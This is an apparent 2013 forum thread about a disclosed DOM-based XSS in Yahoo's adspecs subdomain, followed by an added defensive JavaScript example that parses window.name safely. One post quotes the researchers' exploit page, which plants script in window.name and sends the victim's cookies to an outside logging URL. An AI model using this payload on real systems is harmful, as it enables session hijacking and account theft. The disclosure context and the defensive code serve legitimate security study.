neox Posted January 29, 2013
Vulnerability PoC video: http://www.offensive-security.com/videos/yahoo-xss-0day.mp4
DOMSDAY Analyzing a DOM-Based XSS in Yahoo!
Abysssec Security Research
teko. Posted January 29, 2013
Interesting, and the code from that "evil.html" hasn't been made public, and I hope it doesn't end up public.
nein Posted January 29, 2013
Is it an XSS in Yahoo Mail? In short..
nAb.h4x Posted January 29, 2013
> Is it an XSS in Yahoo Mail? In short..
Yes! It's a DOM-based XSS!
alexx666xx Posted January 29, 2013
It will be made public once the people at Yahoo fix the problem.
ionut97 Posted January 29, 2013
The paper clearly says that the vulnerability was in a JS file used by all the adspecs.yahoo.com subdomains.
Everything was reported and fixed.
http://www.exploit-db.com/wp-content/themes/exploit/docs/24109.pdf
"Final exploit":
<html>
<script>
window.name=' new Image().src="http://abysssec.com/log/log.php?cookie="+encodeURI(document.cookie); setTimeout(\"location.href = \'http:\/\/www.yahoo.com\';\",10);';
location.href="http://adspecs.yahoo.com/index.php";
</script>
</html>
Plus, the XSS could have been found with DOMinator.
Edited January 29, 2013 by ionut97
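
The exploit quoted above relies on window.name keeping its value when the tab navigates to another origin, so the destination page receives a string chosen by the previous page. As an added example (not from the paper or from Yahoo's code; the config schema, `ALLOWED_KEYS`, `readNameAsConfig` and the sample strings are hypothetical), a page that reads window.name can parse it as data only and reject everything else:

```javascript
// `win` stands in for the browser's window object so this also runs under Node.
const ALLOWED_KEYS = new Set(["adId", "width", "height"]); // hypothetical schema

// Read window.name as strict JSON data. The value is never handed to eval(),
// Function(), setTimeout(string) or innerHTML.
function readNameAsConfig(win) {
  const raw = typeof win.name === "string" ? win.name : "";
  win.name = ""; // clear it: a value planted by an earlier page is read at most once
  if (raw.length === 0 || raw.length > 256) return null;

  let data;
  try {
    data = JSON.parse(raw); // data-only parser: script text throws here
  } catch (e) {
    return null;
  }
  if (data === null || typeof data !== "object" || Array.isArray(data)) return null;

  const config = {};
  for (const [key, value] of Object.entries(data)) {
    if (!ALLOWED_KEYS.has(key)) return null; // unknown field: reject the whole value
    if (key === "adId") {
      if (typeof value !== "string" || !/^[A-Za-z0-9_-]{1,32}$/.test(value)) return null;
    } else if (!Number.isInteger(value) || value < 1 || value > 4096) {
      return null;
    }
    config[key] = value;
  }
  return config;
}

// Constructed sample values: one legitimate, one script-shaped like the value
// a hostile opener page could leave behind in window.name.
const BENIGN = '{"adId":"banner_7","width":300,"height":250}';
const HOSTILE = "alert(document.domain);";

console.log(readNameAsConfig({ name: BENIGN }));  // parsed config object
console.log(readNameAsConfig({ name: HOSTILE })); // null
```
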
systemblack Posted January 29, 2013
poc yahoo